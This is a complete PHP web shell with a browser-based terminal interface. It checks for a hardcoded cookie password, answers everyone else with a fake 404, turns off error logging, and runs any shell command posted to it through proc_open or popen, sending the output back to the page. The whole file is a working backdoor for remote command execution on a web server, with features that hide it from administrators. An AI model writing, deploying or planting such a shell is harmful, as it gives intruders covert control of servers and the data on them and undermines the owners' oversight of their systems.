<?php

@error_reporting(0);
@ini_set('log_errors', '0');
@ini_set('memory_limit', '1G');

$C = &$_COOKIE;
if(empty($C['password']) || $C['password']!=='password') {
	@ob_clean();
	@header('HTTP/1.1 404 Not Found');
	exit;
}

session_start();
$S = &$_SESSION;
if(empty($S['cwd'])) $S['cwd'] = getcwd();

if(!empty($_POST['cmd']) && $cmd = trim($_POST['cmd'])) {
	$pos = strpos($cmd, ' ');
	$prog = $pos===false ? $cmd : substr($cmd, 0, $pos);
	$args = $pos===false ? '' : substr($cmd, $pos+1);

	$cwd = $S['cwd'];
	chdir($cwd);

	if($prog==='cd' && !empty($args)) {
		$res = chdir($args);
		$S['cwd'] = getcwd();
		die('cd: '.$S['cwd']);
	}

  $output = '';
  $ret = 0;
  
  __runcmd__($cmd, $output, $ret);
  
	echo $output, "\n".$prog.": [".$ret."]";
	exit;
}


function __runcmd__($cmd, &$output, &$ret) {
  switch(true) {
  case function_exists('proc_open'):
    $desc = array(
      0=>array('pipe', 'r'),
      1=>array('pipe', 'w'),
      2=>array('pipe', 'w')
    );
    
    $proc = proc_open($cmd, $desc, $pipes);
    if(!is_resource($proc)) die('proc failed');
    
    fclose($pipes[0]);
    
    $output .= stream_get_contents($pipes[1]);
    $output .= stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);

    $ret = proc_close($proc);
    break;
  
  case function_exists('popen'):
    echo 'popen ';
    $proc = popen($cmd, 'r');
    while(!feof($proc)) $output .= fread($proc, 1024); 
    pclose($proc);
    break;
    
  }
  
  $output = htmlspecialchars($output);
}


?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Console</title>
<style type="text/css">
html, body {
	font-family:arial;
	margin:0;
	width:100%;
	height:100%;
}
body {
	position:relative;
}
xmp, pre {
	display:block;
	margin:0;
}
body, input[type="text"] {
	background:black;
	color:white;
}
.output-pre {
	position:absolute;
	top:10px;
	bottom:32px;
	left:10px;
	right:10px;
	overflow:auto;
}
.output {
	display:table;
	width:100%;
	height:100%;
}
#output {
	display:table-cell;
	vertical-align:bottom;
}
.cmdline {
	position:fixed;
	bottom:2px;
	left:2px;
	right:2px;
	text-align:center;
	padding:2px;
	border:1px solid white;
}
#cmdline {
	width:100%;
	outline:none;
	border:none;
	padding:0;
	height:16px;
	font-size:13px;
}
</style>
<script type="text/javascript">
+function(){
function $(str){return document.getElementById(str);}
window.addEventListener('load', function(){
	var cmdbuffer = [];
	var buffidx = 0;
	var output = $('output');
	var outpre = $('out-pre');
	var cmd = $('cmdline');
	var me = location.href;
	
	
	cmd.focus();
	cmd.addEventListener('keydown', function(evt) {
		if(evt.keyCode===38) handle_cmd_buffer(true);
		if(evt.keyCode===40) handle_cmd_buffer(false)
		if(evt.keyCode!==13) return;
		var val = cmd.value.trim();
		if(!val) return;
		
		var xhr = new XMLHttpRequest();
		xhr.onreadystatechange = function() {
			if(xhr.readyState===4) handle_response(xhr);
		};
		
		send_to_output('prompt:$ '+cmd.value);
		cmdbuffer.push(cmd.value);
		cmd.value = '';
		buffidx = cmdbuffer.length;
		
		xhr.open('POST', me);
		xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
		xhr.send('cmd='+encodeURIComponent(val));
	});
	
	document.body.addEventListener('keydown', function(evt){
		return;
		var code = evt.keyCode;
		document.title=code;
		if(cmd===document.activeElement) return;
		if(code>=65 && code<=90)
			cmd.focus();
	});

	function handle_response(xhr) {
		send_to_output(xhr.responseText);
	}
	
	function handle_cmd_buffer(prev) {
		if(!cmdbuffer.length) return;
		prev = !!prev;
		if(prev) buffidx--;
		else buffidx++;
		if(buffidx<0) buffidx = 0;
		if(buffidx>=cmdbuffer.length)
			buffidx = cmdbuffer.length-1;
		
		cmd.value = cmdbuffer[buffidx];
	}
	
	function send_to_output(data) {
		var pre = document.createElement('pre');
		pre.innerHTML = data;
		output.appendChild(pre);
		outpre.scrollTop = 1000000000;
	}

});
}();

</script>
</head>
<body>

<div class="output-pre" id="out-pre">
  <div class="output">
  	<div id="output"></div>
  </div>
</div>
<div class="cmdline"><input type="text" id="cmdline" autocomplete="off" autofocus="autofocus" /></div>
</body>
</html>


